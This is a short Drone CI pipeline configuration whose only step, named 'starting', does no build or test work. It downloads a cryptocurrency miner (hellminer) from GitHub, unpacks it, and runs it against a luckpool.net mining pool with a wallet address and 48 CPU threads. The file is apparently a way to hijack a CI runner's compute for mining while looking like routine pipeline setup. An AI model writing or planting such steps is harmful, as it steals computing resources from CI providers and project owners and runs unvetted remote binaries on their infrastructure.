kind: pipeline
type: docker
name: default

platform:
  os: linux
  arch: amd64

steps:
- name: starting
  image: golang
  commands:
  - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xvf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RK2PLreuU6F3Zm7rBzNn5v9MN8TkdyoH7K.atest --cpu 48
